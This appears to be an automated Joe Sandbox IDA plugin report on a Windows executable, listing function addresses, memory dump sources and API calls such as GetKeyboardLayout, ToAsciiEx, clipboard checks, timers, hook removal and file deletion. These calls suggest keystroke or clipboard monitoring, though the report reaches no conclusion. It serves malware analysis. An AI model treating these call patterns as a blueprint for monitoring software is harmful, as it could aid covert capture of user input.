Part of subcall function 00432D80: GetTickCount.KERNEL32 ref: 00433315
Part of subcall function 00432D80: CloseHandle.KERNEL32(00000000), ref: 004333A1

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042775A, Relevance: 9.2, APIs: 6, Instructions: 164time

APIs

Part of subcall function 00431D40: GetKeyboardLayout.USER32(00000000), ref: 00431F1B
Part of subcall function 00431D40: GetKeyboardLayout.USER32(00000000), ref: 0043200C
Part of subcall function 00431D40: IsCharAlphaA.USER32(00000000), ref: 0043206A
Part of subcall function 00431D40: KillTimer.USER32(000601DA,0000000C), ref: 00432347
Part of subcall function 00431D40: GetQueueStatus.USER32(00000010), ref: 0043235A
Part of subcall function 00431D40: SetTimer.USER32(000601DA,0000000C,00003FFF,004037F0), ref: 00432418
Part of subcall function 00431D40: GetForegroundWindow.USER32 ref: 0043250A
Part of subcall function 00431D40: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00432517
Part of subcall function 00431D40: GetKeyboardLayout.USER32(00000000), ref: 00432522
Part of subcall function 00431D40: ToAsciiEx.USER32(00000000,?,?,?,?,?), ref: 00432561
Part of subcall function 00431D40: _strncpy.LIBCMT ref: 004325C4
Part of subcall function 00431D40: _strncpy.LIBCMT ref: 004326C9
Part of subcall function 00431D40: KillTimer.USER32(000601DA,0000000C), ref: 004327B9
Part of subcall function 00431D40: GetQueueStatus.USER32(00000010), ref: 004327CC
Part of subcall function 00431D40: _strncpy.LIBCMT ref: 004329E7

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00425B65, Relevance: 9.2, APIs: 6, Instructions: 164time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426F85, Relevance: 9.2, APIs: 6, Instructions: 164time

APIs

Part of subcall function 004403A0: SetLastError.KERNEL32(00000000), ref: 0044041A
Part of subcall function 004403A0: DeleteFileA.KERNELBASE(004987E9), ref: 00440421
Part of subcall function 004403A0: GetLastError.KERNEL32 ref: 00440430
Part of subcall function 004403A0: FindFirstFileA.KERNEL32(004987E9,?), ref: 004404AB
Part of subcall function 004403A0: GetLastError.KERNEL32 ref: 004404BA
Part of subcall function 004403A0: GetTickCount.KERNEL32 ref: 00440546
Part of subcall function 004403A0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00440565
Part of subcall function 004403A0: GetTickCount.KERNEL32 ref: 0044057B
Part of subcall function 004403A0: DeleteFileA.KERNEL32(?), ref: 004405CF
Part of subcall function 004403A0: GetLastError.KERNEL32 ref: 004405D9
Part of subcall function 004403A0: FindNextFileA.KERNEL32(?,00000010), ref: 004405F9
Part of subcall function 004403A0: FindClose.KERNEL32(?), ref: 0044060C

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00424C95, Relevance: 9.2, APIs: 6, Instructions: 157time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00415820, Relevance: 7.6, APIs: 5, Instructions: 149
time

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E

SetTimer.USER32(000601DA,0000000E,04EF6D80,00403830), ref: 00415880
GetTickCount.KERNEL32 ref: 004158A6
SetTimer.USER32(000601DA,0000000B,00000064,00403730), ref: 004158D5
GetTickCount.KERNEL32 ref: 004158E9

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00423FDA
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
Part of subcall function 00423F40: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
Part of subcall function 00423F40: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
Part of subcall function 00423F40: __alldiv.INT64 ref: 00425256

KillTimer.USER32(000601DA,0000000B), ref: 00415928

Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00489DCF, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131

Control-flow Graph

Executed
Not Executed

APIs

__getbuf.LIBCMT ref: 00489E6E

Strings

8]J, xrefs: 00489ED9
SMH, xrefs: 00489DD6, 00489F0A, 00489EB6, 00489E9B, 00489E60, 00489DD9, 00489E6D, 00489EE8

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004149B0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123
com

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 00414C15

Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9

Strings

No tray mem, xrefs: 00414BEF
Tray, xrefs: 00414BD5

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00486A00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E

std::exception::exception.LIBCMT ref: 00486A4F

Part of subcall function 0048C188: RaiseException.KERNEL32(?,?,00486A7F,0046EE2A,?,?,?,?,00486A7F,0046EE2A,004A15F4,004A80F8,0046EE2A,00000000,004AD3B0,00420EBC), ref: 0048C1CA

Strings

bad allocation, xrefs: 00486A48
iH, xrefs: 00486A32

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00415D10, Relevance: 3.1, APIs: 2, Instructions: 122

APIs

IsWindow.USER32(000601DA), ref: 00415E19
DestroyWindow.USER32(000601DA), ref: 00415E31

Part of subcall function 00409DC0: PostQuitMessage.USER32(00000000), ref: 00409DC9
Part of subcall function 00409DC0: UnhookWindowsHookEx.USER32(00000000), ref: 00409DE5
Part of subcall function 00409DC0: UnregisterHotKey.USER32(000601DA,00000000), ref: 00409E2C

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00484959, Relevance: 1.6, APIs: 1, Instructions: 58

APIs

Part of subcall function 0048938E: GetModuleFileNameW.KERNEL32(00000000,004A8182,00000104,00000001,00000000,004011C4), ref: 0048942A
Part of subcall function 0048938E: _wcslen.LIBCMT ref: 00489459
Part of subcall function 0048938E: _wcslen.LIBCMT ref: 00489466
Part of subcall function 0048938E: GetStdHandle.KERNEL32(000000F4,00000001,00000000,004011C4), ref: 004894DC
Part of subcall function 0048938E: _strlen.LIBCMT ref: 00489519
Part of subcall function 0048938E: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00489528

Part of subcall function 00484A18: ExitProcess.KERNEL32 ref: 00484A29

RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00487175, Relevance: 1.6, APIs: 1, Instructions: 58

APIs

Part of subcall function 0048C631: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,004A18C0,00000010,004871C6,004A1688,0000000C,00487243,?,?,00000040), ref: 0048C6ED
Part of subcall function 0048C631: RtlEnterCriticalSection.NTDLL(?), ref: 0048C716

@_EH4_CallFilterFunc@8.NTDLLP ref: 004871F7

Part of subcall function 0048C39A: __Stoull.NTSTC_LIBCMT ref: 0048C54E
Part of subcall function 0048C39A: __Stoull.NTSTC_LIBCMT ref: 0048C578
Part of subcall function 0048C39A: __Stoull.NTSTC_LIBCMT ref: 0048C597
Part of subcall function 0048C39A: __Stoull.NTSTC_LIBCMT ref: 0048C5B6
Part of subcall function 0048C39A: __wsopen_s.LIBCMT ref: 0048C5FA

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00484A99, Relevance: 1.6, APIs: 1, Instructions: 54

APIs

__initterm_e.LIBCMT ref: 00484ACF

Part of subcall function 00489B20: __FindPESection.LIBCMT ref: 00489B7B

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0048E9C3, Relevance: 1.6, APIs: 1, Instructions: 52

APIs

RtlAllocateHeap.NTDLL(00000008,004719BE,00000000), ref: 0048EA06

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00490BD5, Relevance: 1.6, APIs: 1, Instructions: 51

APIs

__tsopen_nolock.LIBCMT ref: 00490C3F

Part of subcall function 004904A1: CreateFileA.KERNEL32(?,?,?,0000000C,00000001,00000080,00000000), ref: 004906E4
Part of subcall function 004904A1: CreateFileA.KERNEL32(7FFFFFFF,7FFFFFFF,?,0000000C,00000001,00000001,00000000), ref: 0049071D
Part of subcall function 004904A1: GetLastError.KERNEL32 ref: 00490741
Part of subcall function 004904A1: GetFileType.KERNEL32(?), ref: 00490760
Part of subcall function 004904A1: GetLastError.KERNEL32 ref: 00490785
Part of subcall function 004904A1: CloseHandle.KERNEL32(?), ref: 00490797
Part of subcall function 004904A1: __chsize_nolock.LIBCMT ref: 00490873
Part of subcall function 004904A1: CloseHandle.KERNEL32(?), ref: 00490B4D
Part of subcall function 004904A1: CreateFileA.KERNEL32(?,?,?,0000000C,00000003,00000001,00000000), ref: 00490B6D
Part of subcall function 004904A1: GetLastError.KERNEL32 ref: 00490B77

Part of subcall function 00490C6B: __unlock_fhandle.LIBCMT ref: 00490C92

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00487419, Relevance: 1.5, APIs: 1, Instructions: 43

APIs

__freebuf.LIBCMT ref: 0048744D

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00489251, Relevance: 1.5, APIs: 1, Instructions: 10

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00487BF6), ref: 0048925A

Memory Dump Source

